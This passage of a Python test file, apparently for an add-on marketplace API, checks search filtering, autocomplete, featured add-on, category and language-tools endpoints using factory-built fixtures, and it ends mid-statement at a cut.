assert data['results'][0]['id'] == addon.pk
def test_filter_by_featured_app_and_langs(self):
fx_addon = addon_factory(slug='my-addon', name=u'Featured Addôn')
collection = collection_factory()
FeaturedCollection.objects.create(
collection=collection, application=amo.FIREFOX.id)
collection.add_addon(fx_addon)
fx_fr_addon = addon_factory(slug='my-addon', name=u'Lé Featured Addôn')
collection = collection_factory()
FeaturedCollection.objects.create(
collection=collection, application=amo.FIREFOX.id, locale='fr')
collection.add_addon(fx_fr_addon)
fn_addon = addon_factory(slug='my-addon', name=u'Featured Addôn 2 go')
collection = collection_factory()
FeaturedCollection.objects.create(
collection=collection, application=amo.ANDROID.id)
collection.add_addon(fn_addon)
fn_fr_addon = addon_factory(slug='my-addon', name=u'Lé Featured Mobil')
collection = collection_factory()
FeaturedCollection.objects.create(
collection=collection, application=amo.ANDROID.id, locale='fr')
collection.add_addon(fn_fr_addon)
addon_factory(slug='other-addon', name=u'Other Addôn')
self.reindex(Addon)
# Searching for just Firefox should return the two Firefox collections.
# The filter should be `Q('term', **{'featured_for.application': app})`
data = self.perform_search(self.url, {'featured': 'true',
'app': 'firefox'})
assert data['count'] == 2 == len(data['results'])
ids = {data['results'][0]['id'], data['results'][1]['id']}
self.assertSetEqual(ids, {fx_addon.pk, fx_fr_addon.pk})
# If we specify lang 'fr' too it should be the same collections.
# In addition to the app query above, this will be executed too:
# `Q('terms', **{'featured_for.locales': [locale, 'ALL']}))`
data = self.perform_search(
self.url, {'featured': 'true', 'app': 'firefox', 'lang': 'fr'})
assert data['count'] == 2 == len(data['results'])
ids = {data['results'][0]['id'], data['results'][1]['id']}
self.assertSetEqual(ids, {fx_addon.pk, fx_fr_addon.pk})
# But 'en-US' will exclude the 'fr' collection.
data = self.perform_search(
self.url, {'featured': 'true', 'app': 'firefox',
'lang': 'en-US'})
assert data['count'] == 1 == len(data['results'])
assert data['results'][0]['id'] == fx_addon.pk
# If we only search for lang, application is ignored.
# Just `Q('terms', **{'featured_for.locales': [locale, 'ALL']}))` now.
data = self.perform_search(
self.url, {'featured': 'true', 'lang': 'en-US'})
assert data['count'] == 2 == len(data['results'])
ids = {data['results'][0]['id'], data['results'][1]['id']}
self.assertSetEqual(ids, {fx_addon.pk, fn_addon.pk})
data = self.perform_search(
self.url, {'featured': 'true', 'lang': 'fr'})
assert data['count'] == 4 == len(data['results'])
ids = {data['results'][0]['id'], data['results'][1]['id'],
data['results'][2]['id'], data['results'][3]['id']}
self.assertSetEqual(
ids, {fx_addon.pk, fx_fr_addon.pk, fn_addon.pk, fn_fr_addon.pk})
def test_filter_by_platform(self):
# First add-on is available for all platforms.
addon = addon_factory(slug='my-addon', name=u'My Addôn',
weekly_downloads=33)
addon_factory(
slug='my-linux-addon', name=u'My linux-only Addön',
file_kw={'platform': amo.PLATFORM_LINUX.id},
weekly_downloads=22)
mac_addon = addon_factory(
slug='my-mac-addon', name=u'My mac-only Addön',
file_kw={'platform': amo.PLATFORM_MAC.id},
weekly_downloads=11)
self.refresh()
data = self.perform_search(self.url)
assert data['count'] == 3
assert len(data['results']) == 3
assert data['results'][0]['id'] == addon.pk
data = self.perform_search(self.url, {'platform': 'mac'})
assert data['count'] == 2
assert len(data['results']) == 2
assert data['results'][0]['id'] == addon.pk
assert data['results'][1]['id'] == mac_addon.pk
def test_filter_by_app(self):
addon = addon_factory(
slug='my-addon', name=u'My Addôn', weekly_downloads=33,
version_kw={'min_app_version': '42.0',
'max_app_version': '*'})
tb_addon = addon_factory(
slug='my-tb-addon', name=u'My TBV Addøn', weekly_downloads=22,
version_kw={'application': amo.THUNDERBIRD.id,
'min_app_version': '42.0',
'max_app_version': '*'})
both_addon = addon_factory(
slug='my-both-addon', name=u'My Both Addøn', weekly_downloads=11,
version_kw={'min_app_version': '43.0',
'max_app_version': '*'})
# both_addon was created with firefox compatibility, manually add
# thunderbird, making it compatible with both.
ApplicationsVersions.objects.create(
application=amo.THUNDERBIRD.id, version=both_addon.current_version,
min=AppVersion.objects.create(
application=amo.THUNDERBIRD.id, version='43.0'),
max=AppVersion.objects.get(
application=amo.THUNDERBIRD.id, version='*'))
# Because the manually created ApplicationsVersions was created after
# the initial save, we need to reindex and not just refresh.
self.reindex(Addon)
data = self.perform_search(self.url, {'app': 'firefox'})
assert data['count'] == 2
assert len(data['results']) == 2
assert data['results'][0]['id'] == addon.pk
assert data['results'][1]['id'] == both_addon.pk
data = self.perform_search(self.url, {'app': 'thunderbird'})
assert data['count'] == 2
assert len(data['results']) == 2
assert data['results'][0]['id'] == tb_addon.pk
assert data['results'][1]['id'] == both_addon.pk
def test_filter_by_appversion(self):
addon = addon_factory(
slug='my-addon', name=u'My Addôn', weekly_downloads=33,
version_kw={'min_app_version': '42.0',
'max_app_version': '*'})
tb_addon = addon_factory(
slug='my-tb-addon', name=u'My TBV Addøn', weekly_downloads=22,
version_kw={'application': amo.THUNDERBIRD.id,
'min_app_version': '42.0',
'max_app_version': '*'})
both_addon = addon_factory(
slug='my-both-addon', name=u'My Both Addøn', weekly_downloads=11,
version_kw={'min_app_version': '43.0',
'max_app_version': '*'})
# both_addon was created with firefox compatibility, manually add
# thunderbird, making it compatible with both.
ApplicationsVersions.objects.create(
application=amo.THUNDERBIRD.id, version=both_addon.current_version,
min=AppVersion.objects.create(
application=amo.THUNDERBIRD.id, version='43.0'),
max=AppVersion.objects.get(
application=amo.THUNDERBIRD.id, version='*'))
# Because the manually created ApplicationsVersions was created after
# the initial save, we need to reindex and not just refresh.
self.reindex(Addon)
data = self.perform_search(self.url, {'app': 'firefox',
'appversion': '46.0'})
assert data['count'] == 2
assert len(data['results']) == 2
assert data['results'][0]['id'] == addon.pk
assert data['results'][1]['id'] == both_addon.pk
data = self.perform_search(self.url, {'app': 'thunderbird',
'appversion': '43.0.1'})
assert data['count'] == 2
assert len(data['results']) == 2
assert data['results'][0]['id'] == tb_addon.pk
assert data['results'][1]['id'] == both_addon.pk
data = self.perform_search(self.url, {'app': 'firefox',
'appversion': '42.0'})
assert data['count'] == 1
assert len(data['results']) == 1
assert data['results'][0]['id'] == addon.pk
data = self.perform_search(self.url, {'app': 'thunderbird',
'appversion': '42.0.1'})
assert data['count'] == 1
assert len(data['results']) == 1
assert data['results'][0]['id'] == tb_addon.pk
def test_filter_by_category(self):
static_category = (
CATEGORIES[amo.FIREFOX.id][amo.ADDON_EXTENSION]['alerts-updates'])
category = Category.from_static_category(static_category, True)
addon = addon_factory(
slug='my-addon', name=u'My Addôn', category=category)
self.refresh()
# Create an add-on in a different category.
static_category = (
CATEGORIES[amo.FIREFOX.id][amo.ADDON_EXTENSION]['tabs'])
other_category = Category.from_static_category(static_category, True)
addon_factory(slug='different-addon', category=other_category)
self.refresh()
# Search for add-ons in the first category. There should be only one.
data = self.perform_search(self.url, {'app': 'firefox',
'type': 'extension',
'category': category.slug})
assert data['count'] == 1
assert len(data['results']) == 1
assert data['results'][0]['id'] == addon.pk
def test_filter_by_category_multiple_types(self):
def get_category(type_, name):
static_category = (
CATEGORIES[amo.FIREFOX.id][type_][name])
return Category.from_static_category(static_category, True)
addon_lwt = addon_factory(
slug='my-addon-lwt', name=u'My Addôn LWT',
category=get_category(amo.ADDON_PERSONA, 'holiday'),
type=amo.ADDON_PERSONA)
addon_st = addon_factory(
slug='my-addon-st', name=u'My Addôn ST',
category=get_category(amo.ADDON_STATICTHEME, 'holiday'),
type=amo.ADDON_STATICTHEME)
self.refresh()
# Create some add-ons in a different category.
addon_factory(
slug='different-addon-lwt', name=u'Diff Addôn LWT',
category=get_category(amo.ADDON_PERSONA, 'sports'),
type=amo.ADDON_PERSONA)
addon_factory(
slug='different-addon-st', name=u'Diff Addôn ST',
category=get_category(amo.ADDON_STATICTHEME, 'sports'),
type=amo.ADDON_STATICTHEME)
self.refresh()
# Search for add-ons in the first category. There should be two.
data = self.perform_search(self.url, {'app': 'firefox',
'type': 'persona,statictheme',
'category': 'holiday'})
assert data['count'] == 2
assert len(data['results']) == 2
result_ids = (data['results'][0]['id'], data['results'][1]['id'])
assert sorted(result_ids) == [addon_lwt.pk, addon_st.pk]
def test_filter_with_tags(self):
addon = addon_factory(slug='my-addon', name=u'My Addôn',
tags=['some_tag'], weekly_downloads=999)
addon2 = addon_factory(slug='another-addon', name=u'Another Addôn',
tags=['unique_tag', 'some_tag'],
weekly_downloads=333)
addon3 = addon_factory(slug='unrelated', name=u'Unrelated',
tags=['unrelated'])
self.refresh()
data = self.perform_search(self.url, {'tag': 'some_tag'})
assert data['count'] == 2
assert len(data['results']) == 2
result = data['results'][0]
assert result['id'] == addon.pk
assert result['slug'] == addon.slug
assert result['tags'] == ['some_tag']
result = data['results'][1]
assert result['id'] == addon2.pk
assert result['slug'] == addon2.slug
assert result['tags'] == ['some_tag', 'unique_tag']
data = self.perform_search(self.url, {'tag': 'unrelated'})
assert data['count'] == 1
assert len(data['results']) == 1
result = data['results'][0]
assert result['id'] == addon3.pk
assert result['slug'] == addon3.slug
assert result['tags'] == ['unrelated']
data = self.perform_search(self.url, {'tag': 'unique_tag,some_tag'})
assert data['count'] == 1
assert len(data['results']) == 1
result = data['results'][0]
assert result['id'] == addon2.pk
assert result['slug'] == addon2.slug
assert result['tags'] == ['some_tag', 'unique_tag']
def test_bad_filter(self):
data = self.perform_search(
self.url, {'app': 'lol'}, expected_status=400)
assert data == ['Invalid "app" parameter.']
def test_filter_by_author(self):
author = user_factory(username=u'my-fancyAuthôr')
addon = addon_factory(slug='my-addon', name=u'My Addôn',
tags=['some_tag'], weekly_downloads=999)
AddonUser.objects.create(addon=addon, user=author)
addon2 = addon_factory(slug='another-addon', name=u'Another Addôn',
tags=['unique_tag', 'some_tag'],
weekly_downloads=333)
author2 = user_factory(username=u'my-FancyAuthôrName')
AddonUser.objects.create(addon=addon2, user=author2)
self.reindex(Addon)
data = self.perform_search(self.url, {'author': u'my-fancyAuthôr'})
assert data['count'] == 1
assert len(data['results']) == 1
result = data['results'][0]
assert result['id'] == addon.pk
assert result['slug'] == addon.slug
def test_filter_by_multiple_authors(self):
author = user_factory(username='foo')
author2 = user_factory(username='bar')
another_author = user_factory(username='someoneelse')
addon = addon_factory(slug='my-addon', name=u'My Addôn',
tags=['some_tag'], weekly_downloads=999)
AddonUser.objects.create(addon=addon, user=author)
AddonUser.objects.create(addon=addon, user=author2)
addon2 = addon_factory(slug='another-addon', name=u'Another Addôn',
tags=['unique_tag', 'some_tag'],
weekly_downloads=333)
AddonUser.objects.create(addon=addon2, user=author2)
another_addon = addon_factory()
AddonUser.objects.create(addon=another_addon, user=another_author)
self.reindex(Addon)
data = self.perform_search(self.url, {'author': u'foo,bar'})
assert data['count'] == 2
assert len(data['results']) == 2
result = data['results'][0]
assert result['id'] == addon.pk
assert result['slug'] == addon.slug
result = data['results'][1]
assert result['id'] == addon2.pk
assert result['slug'] == addon2.slug
def test_filter_by_guid(self):
addon = addon_factory(slug='my-addon', name=u'My Addôn',
guid='random@guid', weekly_downloads=999)
addon_factory()
self.reindex(Addon)
data = self.perform_search(self.url, {'guid': u'random@guid'})
assert data['count'] == 1
assert len(data['results']) == 1
result = data['results'][0]
assert result['id'] == addon.pk
assert result['slug'] == addon.slug
def test_filter_by_multiple_guid(self):
addon = addon_factory(slug='my-addon', name=u'My Addôn',
guid='random@guid', weekly_downloads=999)
addon2 = addon_factory(slug='another-addon', name=u'Another Addôn',
guid='random2@guid',
weekly_downloads=333)
addon_factory()
self.reindex(Addon)
data = self.perform_search(
self.url, {'guid': u'random@guid,random2@guid'})
assert data['count'] == 2
assert len(data['results']) == 2
result = data['results'][0]
assert result['id'] == addon.pk
assert result['slug'] == addon.slug
result = data['results'][1]
assert result['id'] == addon2.pk
assert result['slug'] == addon2.slug
# Throw in soome random invalid guids too that will be ignored.
data = self.perform_search(
self.url, {
'guid': u'random@guid,invalid@guid,notevenaguid$,random2@guid'}
)
assert data['count'] == len(data['results']) == 2
assert data['results'][0]['id'] == addon.pk
assert data['results'][1]['id'] == addon2.pk
def test_find_addon_default_non_en_us(self):
with self.activate('en-GB'):
addon = addon_factory(
status=amo.STATUS_PUBLIC,
type=amo.ADDON_EXTENSION,
default_locale='en-GB',
name='Banana Bonkers',
description=u'Let your browser eat your bananas',
summary=u'Banana Summary',
)
addon.name = {'es': u'Banana Bonkers espanole'}
addon.description = {
'es': u'Deje que su navegador coma sus plátanos'}
addon.summary = {'es': u'resumen banana'}
addon.save()
addon_factory(
slug='English Addon', name=u'My English Addôn')
self.reindex(Addon)
for locale in ('en-US', 'en-GB', 'es'):
with self.activate(locale):
url = reverse_ns('addon-search')
data = self.perform_search(url, {'lang': locale})
assert data['count'] == 2
assert len(data['results']) == 2
data = self.perform_search(
url, {'q': 'Banana', 'lang': locale})
result = data['results'][0]
assert result['id'] == addon.pk
assert result['slug'] == addon.slug
def test_exclude_addons(self):
addon1 = addon_factory()
addon2 = addon_factory()
addon3 = addon_factory()
self.refresh()
# Exclude addon2 and addon3 by slug.
data = self.perform_search(
self.url, {'exclude_addons': u','.join(
(addon2.slug, addon3.slug))})
assert len(data['results']) == 1
assert data['count'] == 1
assert data['results'][0]['id'] == addon1.pk
# Exclude addon1 and addon2 by pk.
data = self.perform_search(
self.url, {'exclude_addons': u','.join(
map(unicode, (addon2.pk, addon1.pk)))})
assert len(data['results']) == 1
assert data['count'] == 1
assert data['results'][0]['id'] == addon3.pk
# Exclude addon1 by pk and addon3 by slug.
data = self.perform_search(
self.url, {'exclude_addons': u','.join(
(unicode(addon1.pk), addon3.slug))})
assert len(data['results']) == 1
assert data['count'] == 1
assert data['results'][0]['id'] == addon2.pk
def test_filter_fuzziness(self):
with self.activate('de'):
addon = addon_factory(slug='my-addon', name={
'de': 'Mein Taschenmesser'
}, default_locale='de')
# Won't get matched, we have a prefix length of 4 so that
# the first 4 characters are not analyzed for fuzziness
addon_factory(slug='my-addon2', name={
'de': u'Mein Hufrinnenmesser'
}, default_locale='de')
self.refresh()
with self.activate('de'):
data = self.perform_search(self.url, {'q': 'Taschenmssser'})
assert data['count'] == 1
assert len(data['results']) == 1
assert data['results'][0]['id'] == addon.pk
def test_prevent_too_complex_to_determinize_exception(self):
# too_complex_to_determinize_exception happens in elasticsearch when
# we do a fuzzy query with a query string that is well, too complex,
# with specific unicode chars and too long. For this reason we
# deactivate fuzzy matching if the query is over 20 chars. This test
# contain a string that was causing such breakage before.
# Populate the index with a few add-ons first (enough to trigger the
# issue locally).
for i in range(0, 10):
addon_factory()
self.refresh()
query = (u'남포역립카페추천 ˇjjtat닷컴ˇ ≡제이제이♠♣ 남포역스파 '
u'남포역op남포역유흥≡남포역안마남포역오피 ♠♣')
data = self.perform_search(self.url, {'q': query})
# No results, but no 500 either.
assert data['count'] == 0
class TestAddonAutoCompleteSearchView(ESTestCase):
client_class = APITestClient
fixtures = ['base/users']
def setUp(self):
super(TestAddonAutoCompleteSearchView, self).setUp()
self.url = reverse_ns('addon-autocomplete')
def tearDown(self):
super(TestAddonAutoCompleteSearchView, self).tearDown()
self.empty_index('default')
self.refresh()
def perform_search(self, url, data=None, expected_status=200, **headers):
# Just to cache the waffle switch, to avoid polluting the
# assertNumQueries() call later.
waffle.switch_is_active('boost-webextensions-in-search')
with self.assertNumQueries(0):
response = self.client.get(url, data, **headers)
assert response.status_code == expected_status
data = json.loads(response.content)
return data
def test_basic(self):
addon = addon_factory(slug='my-addon', name=u'My Addôn')
addon2 = addon_factory(slug='my-second-addon', name=u'My second Addôn')
addon_factory(slug='nonsense', name=u'Nope Nope Nope')
self.refresh()
data = self.perform_search(self.url, {'q': 'my'}) # No db query.
assert 'count' not in data
assert 'next' not in data
assert 'prev' not in data
assert len(data['results']) == 2
assert {itm['id'] for itm in data['results']} == {addon.pk, addon2.pk}
def test_type(self):
addon = addon_factory(
slug='my-addon', name=u'My Addôn', type=amo.ADDON_EXTENSION)
addon2 = addon_factory(
slug='my-second-addon', name=u'My second Addôn',
type=amo.ADDON_PERSONA)
addon_factory(slug='nonsense', name=u'Nope Nope Nope')
addon_factory(
slug='whocares', name=u'My xul theme', type=amo.ADDON_THEME)
self.refresh()
data = self.perform_search(
self.url, {'q': 'my', 'type': 'persona,extension'}) # No db query.
assert 'count' not in data
assert 'next' not in data
assert 'prev' not in data
assert len(data['results']) == 2
assert {itm['id'] for itm in data['results']} == {addon.pk, addon2.pk}
def test_default_locale_fallback_still_works_for_translations(self):
addon = addon_factory(default_locale='pt-BR', name='foobar')
# Couple quick checks to make sure the add-on is in the right state
# before testing.
assert addon.default_locale == 'pt-BR'
assert addon.name.locale == 'pt-br'
self.refresh()
# Search in a different language than the one used for the name: we
# should fall back to default_locale and find the translation.
data = self.perform_search(self.url, {'q': 'foobar', 'lang': 'fr'})
assert data['results'][0]['name'] == 'foobar'
# Same deal in en-US.
data = self.perform_search(self.url, {'q': 'foobar', 'lang': 'en-US'})
assert data['results'][0]['name'] == 'foobar'
def test_empty(self):
data = self.perform_search(self.url)
assert 'count' not in data
assert len(data['results']) == 0
def test_get_queryset_excludes(self):
addon_factory(slug='my-addon', name=u'My Addôn',
weekly_downloads=666)
addon_factory(slug='my-persona', name=u'My Persona',
type=amo.ADDON_PERSONA)
self.refresh()
view = AddonAutoCompleteSearchView()
view.request = APIRequestFactory().get('/')
qset = view.get_queryset()
includes = set((
'default_locale', 'icon_type', 'id', 'modified',
'name_translations', 'persona', 'slug', 'type'))
assert set(qset.to_dict()['_source']['includes']) == includes
response = qset.execute()
# Sort by type to avoid sorting problems before picking the
# first result. (We have a theme and an add-on)
hit = sorted(response.hits.hits, key=lambda x: x['_source']['type'])
assert set(hit[1]['_source'].keys()) == includes
def test_no_unlisted(self):
addon_factory(slug='my-addon', name=u'My Addôn',
status=amo.STATUS_NULL,
weekly_downloads=666,
version_kw={'channel': amo.RELEASE_CHANNEL_UNLISTED})
self.refresh()
data = self.perform_search(self.url)
assert 'count' not in data
assert len(data['results']) == 0
def test_pagination(self):
[addon_factory() for x in range(0, 11)]
self.refresh()
# page_size should be ignored, we should get 10 results.
data = self.perform_search(self.url, {'page_size': 1})
assert 'count' not in data
assert 'next' not in data
assert 'prev' not in data
assert len(data['results']) == 10
class TestAddonFeaturedView(TestCase):
client_class = APITestClient
def setUp(self):
self.url = reverse_ns('addon-featured')
def test_no_parameters(self):
response = self.client.get(self.url)
assert response.status_code == 400
assert json.loads(response.content) == {
'detail': 'Invalid app, category and/or type parameter(s).'}
@patch('olympia.addons.views.get_featured_ids')
def test_app_only(self, get_featured_ids_mock):
addon1 = addon_factory()
addon2 = addon_factory()
get_featured_ids_mock.return_value = [addon1.pk, addon2.pk]
response = self.client.get(self.url, {'app': 'firefox'})
assert get_featured_ids_mock.call_count == 1
assert (get_featured_ids_mock.call_args_list[0][0][0] ==
amo.FIREFOX) # app
assert (get_featured_ids_mock.call_args_list[0][1] ==
{'types': None, 'lang': None})
assert response.status_code == 200
data = json.loads(response.content)
assert data['results']
assert len(data['results']) == 2
assert data['results'][0]['id'] == addon1.pk
assert data['results'][1]['id'] == addon2.pk
@patch('olympia.addons.views.get_featured_ids')
def test_app_and_type(self, get_featured_ids_mock):
addon1 = addon_factory()
addon2 = addon_factory()
get_featured_ids_mock.return_value = [addon1.pk, addon2.pk]
response = self.client.get(self.url, {
'app': 'firefox', 'type': 'extension'
})
assert get_featured_ids_mock.call_count == 1
assert (get_featured_ids_mock.call_args_list[0][0][0] ==
amo.FIREFOX) # app
assert (get_featured_ids_mock.call_args_list[0][1] ==
{'types': [amo.ADDON_EXTENSION], 'lang': None})
assert response.status_code == 200
data = json.loads(response.content)
assert data['results']
assert len(data['results']) == 2
assert data['results'][0]['id'] == addon1.pk
assert data['results'][1]['id'] == addon2.pk
@patch('olympia.addons.views.get_featured_ids')
def test_app_and_types(self, get_featured_ids_mock):
addon1 = addon_factory()
addon2 = addon_factory()
get_featured_ids_mock.return_value = [addon1.pk, addon2.pk]
response = self.client.get(self.url, {
'app': 'firefox', 'type': 'extension,theme'
})
assert get_featured_ids_mock.call_count == 1
assert (get_featured_ids_mock.call_args_list[0][0][0] ==
amo.FIREFOX) # app
assert (get_featured_ids_mock.call_args_list[0][1] ==
{'types': [amo.ADDON_EXTENSION, amo.ADDON_THEME],
'lang': None})
assert response.status_code == 200
data = json.loads(response.content)
assert data['results']
assert len(data['results']) == 2
assert data['results'][0]['id'] == addon1.pk
assert data['results'][1]['id'] == addon2.pk
@patch('olympia.addons.views.get_featured_ids')
def test_app_and_type_and_lang(self, get_featured_ids_mock):
addon1 = addon_factory()
addon2 = addon_factory()
get_featured_ids_mock.return_value = [addon1.pk, addon2.pk]
response = self.client.get(self.url, {
'app': 'firefox', 'type': 'extension', 'lang': 'es'
})
assert get_featured_ids_mock.call_count == 1
assert (get_featured_ids_mock.call_args_list[0][0][0] ==
amo.FIREFOX) # app
assert (get_featured_ids_mock.call_args_list[0][1] ==
{'types': [amo.ADDON_EXTENSION], 'lang': 'es'})
assert response.status_code == 200
data = json.loads(response.content)
assert data['results']
assert len(data['results']) == 2
assert data['results'][0]['id'] == addon1.pk
assert data['results'][1]['id'] == addon2.pk
def test_invalid_app(self):
response = self.client.get(
self.url, {'app': 'foxeh', 'type': 'extension'})
assert response.status_code == 400
assert json.loads(response.content) == {
'detail': 'Invalid app, category and/or type parameter(s).'}
def test_invalid_type(self):
response = self.client.get(self.url, {'app': 'firefox', 'type': 'lol'})
assert response.status_code == 400
assert json.loads(response.content) == {
'detail': 'Invalid app, category and/or type parameter(s).'}
def test_category_no_app_or_type(self):
response = self.client.get(self.url, {'category': 'lol'})
assert response.status_code == 400
assert json.loads(response.content) == {
'detail': 'Invalid app, category and/or type parameter(s).'}
def test_invalid_category(self):
response = self.client.get(self.url, {
'category': 'lol', 'app': 'firefox', 'type': 'extension'
})
assert response.status_code == 400
assert json.loads(response.content) == {
'detail': 'Invalid app, category and/or type parameter(s).'}
@patch('olympia.addons.views.get_creatured_ids')
def test_category(self, get_creatured_ids_mock):
addon1 = addon_factory()
addon2 = addon_factory()
get_creatured_ids_mock.return_value = [addon1.pk, addon2.pk]
response = self.client.get(self.url, {
'category': 'alerts-updates', 'app': 'firefox', 'type': 'extension'
})
assert get_creatured_ids_mock.call_count == 1
assert get_creatured_ids_mock.call_args_list[0][0][0] == 72 # category
assert get_creatured_ids_mock.call_args_list[0][0][1] is None # lang
assert response.status_code == 200
data = json.loads(response.content)
assert data['results']
assert len(data['results']) == 2
assert data['results'][0]['id'] == addon1.pk
assert data['results'][1]['id'] == addon2.pk
@patch('olympia.addons.views.get_creatured_ids')
def test_category_with_multiple_types(self, get_creatured_ids_mock):
addon1 = addon_factory()
addon2 = addon_factory()
get_creatured_ids_mock.return_value = [addon1.pk, addon2.pk]
response = self.client.get(self.url, {
'category': 'nature', 'app': 'firefox',
'type': 'persona,statictheme'
})
assert get_creatured_ids_mock.call_count == 2
assert get_creatured_ids_mock.call_args_list[0][0][0] == 102 # cat
assert get_creatured_ids_mock.call_args_list[0][0][1] is None # lang
assert get_creatured_ids_mock.call_args_list[1][0][0] == 302 # cat
assert get_creatured_ids_mock.call_args_list[1][0][1] is None # lang
assert response.status_code == 200
data = json.loads(response.content)
assert data['results']
assert len(data['results']) == 2
assert data['results'][0]['id'] == addon1.pk
assert data['results'][1]['id'] == addon2.pk
@patch('olympia.addons.views.get_creatured_ids')
def test_category_with_lang(self, get_creatured_ids_mock):
addon1 = addon_factory()
addon2 = addon_factory()
get_creatured_ids_mock.return_value = [addon1.pk, addon2.pk]
response = self.client.get(self.url, {
'category': 'alerts-updates', 'app': 'firefox',
'type': 'extension', 'lang': 'fr',
})
assert get_creatured_ids_mock.call_count == 1
assert get_creatured_ids_mock.call_args_list[0][0][0] == 72 # cat id.
assert get_creatured_ids_mock.call_args_list[0][0][1] == 'fr' # lang
assert response.status_code == 200
data = json.loads(response.content)
assert data['results']
assert len(data['results']) == 2
assert data['results'][0]['id'] == addon1.pk
assert data['results'][1]['id'] == addon2.pk
class TestStaticCategoryView(TestCase):
client_class = APITestClient
def setUp(self):
super(TestStaticCategoryView, self).setUp()
self.url = reverse_ns('category-list')
def test_basic(self):
with self.assertNumQueries(0):
response = self.client.get(self.url)
assert response.status_code == 200
data = json.loads(response.content)
assert len(data) == 113
# some basic checks to verify integrity
entry = data[0]
assert entry == {
u'name': u'Feeds, News & Blogging',
u'weight': 0,
u'misc': False,
u'id': 1,
u'application': u'firefox',
u'description': None,
u'type': u'extension',
u'slug': u'feeds-news-blogging'
}
def test_with_description(self):
# StaticCategory is immutable, so avoid calling it's __setattr__
# directly.
object.__setattr__(CATEGORIES_BY_ID[1], 'description', u'does stuff')
with self.assertNumQueries(0):
response = self.client.get(self.url)
assert response.status_code == 200
data = json.loads(response.content)
assert len(data) == 113
# some basic checks to verify integrity
entry = data[0]
assert entry == {
u'name': u'Feeds, News & Blogging',
u'weight': 0,
u'misc': False,
u'id': 1,
u'application': u'firefox',
u'description': u'does stuff',
u'type': u'extension',
u'slug': u'feeds-news-blogging'
}
@pytest.mark.needs_locales_compilation
def test_name_translated(self):
with self.assertNumQueries(0):
response = self.client.get(self.url, HTTP_ACCEPT_LANGUAGE='de')
assert response.status_code == 200
data = json.loads(response.content)
assert data[0]['name'] == 'RSS-Feeds, Nachrichten & Bloggen'
def test_cache_control(self):
response = self.client.get(self.url)
assert response.status_code == 200
assert response['cache-control'] == 'max-age=21600'
class TestLanguageToolsView(TestCase):
client_class = APITestClient
def setUp(self):
super(TestLanguageToolsView, self).setUp()
self.url = reverse_ns('addon-language-tools')
def test_wrong_app_or_no_app(self):
response = self.client.get(self.url)
assert response.status_code == 400
assert response.data == {
'detail': u'Invalid or missing app parameter.'}
response = self.client.get(self.url, {'app': 'foo'})
assert response.status_code == 400
assert response.data == {
'detail': u'Invalid or missing app parameter.'}
def test_basic(self):
dictionary = addon_factory(type=amo.ADDON_DICT, target_locale='fr')
dictionary_spelling_variant = addon_factory(
type=amo.ADDON_DICT, target_locale='fr',
locale_disambiguation='For spelling reform')
language_pack = addon_factory(
type=amo.ADDON_LPAPP, target_locale='es',
file_kw={'strict_compatibility': True},
version_kw={'min_app_version': '57.0', 'max_app_version': '57.*'})
# These add-ons below should be ignored: they are either not public or
# of the wrong type, not supporting the app we care about, or their
# target locale is empty.
addon_factory(
type=amo.ADDON_LPAPP, target_locale='de',
version_kw={'application': amo.THUNDERBIRD.id})
addon_factory(
type=amo.ADDON_DICT, target_locale='fr',
version_kw={'channel': amo.RELEASE_CHANNEL_UNLISTED})
addon_factory(
type=amo.ADDON_LPAPP, target_locale='es',
file_kw={'status': amo.STATUS_AWAITING_REVIEW},
status=amo.STATUS_NOMINATED)
addon_factory(type=amo.ADDON_DICT, target_locale='')
addon_factory(type=amo.ADDON_LPAPP, target_locale=None)
addon_factory(target_locale='fr')
response = self.client.get(self.url, {'app': 'firefox'})
assert response.status_code == 200
data = json.loads(response.content)
assert len(data['results']) == 3
expected = [dictionary, dictionary_spelling_variant, language_pack]
assert len(data['results']) == len(expected)
assert (
set(item['id'] for item in data['results']) ==
set(item.pk for item in expected))
assert 'locale_disambiguation' in data['results'][0]
assert 'target_locale' in data['results'][0]
# We were not filtering by appversion, so we do not get the
# current_compatible_version property.
assert 'current_compatible_version' not in data['results'][0]
def test_with_appversion_but_no_type(self):
response = self.client.get(
self.url, {'app': 'firefox', 'appversion': '57.0'})
assert response.status_code == 400
assert response.data == {
'detail': 'Invalid or missing type parameter while appversion '
'parameter is set.'}
def test_with_invalid_appversion(self):
response = self.client.get(
self.url,
{'app': 'firefox', 'type': 'language', 'appversion': u'foôbar'})
assert response.status_code == 400
assert response.data == {'detail': 'Invalid appversion parameter.'}
def test_with_author_filtering(self):
user = user_factory(username=u'mozillä')
addon1 = addon_factory(type=amo.ADDON_LPAPP, target_locale='de')
addon2 = addon_factory(type=amo.ADDON_LPAPP, target_locale='fr')
AddonUser.objects.create(addon=addon1, user=user)
AddonUser.objects.create(addon=addon2, user=user)
# These 2 should not show up: it's either not the right author, or
# the author is not listed.
addon3 = addon_factory(type=amo.ADDON_LPAPP, target_locale='es')
AddonUser.objects.create(addon=addon3, user=user, listed=False)
addon_factory(type=amo.ADDON_LPAPP, target_locale='it')
response = self.client.get(
self.url,
{'app': 'firefox', 'type': 'language', 'author': u'mozillä'})
assert response.status_code == 200
data = json.loads(response.content)
expected = [addon1, addon2]
assert len(data['results']) == len(expected)
assert (
set(item['id'] for item in data['results']) ==
set(item.pk for item in expected))
def test_with_multiple_authors_filtering(self):
user1 = user_factory(username=u'mozillä')
user2 = user_factory(username=u'firefôx')
addon1 = addon_factory(type=amo.ADDON_LPAPP, target_locale='de')
addon2 = addon_factory(type=amo.ADDON_LPAPP, target_locale='fr')
AddonUser.objects.create(addon=addon1, user=user1)
AddonUser.objects.create(addon=addon2, user=user2)
# These 2 should not show up: it's either not the right author, or
# the author is not listed.
addon3 = addon_factory(type=amo.ADDON_LPAPP, target_locale='es')
AddonUser.objects.create(addon=addon3, user=user1, listed=False)
addon_factory(type=amo.ADDON_LPAPP, target_locale='it')
response = self.client.get(
self.url,
{'app': 'firefox', 'type': 'language',
'author': u'mozillä,firefôx'})
assert response.status_code == 200
data = json.loads(response.content)
expected = [addon1, addon2]
assert len(data['results']) == len(expected)
assert (
set(item['id'] for item in data['results']) ==
set(item.pk for item in expected))
def test_with_appversion_filtering(self):
# Add compatible add-ons. We're going to request language packs
# compatible with 58.0.
compatible_pack1 = addon_factory(
name='Spanish Language Pack',
type=amo.ADDON_LPAPP, target_locale='es',
file_kw={'strict_compatibility': True},
version_kw={'min_app_version': '57.0', 'max_app_version': '57.*'})
compatible_pack1.current_version.update(created=self.days_ago(2))
compatible_version1 = version_factory(
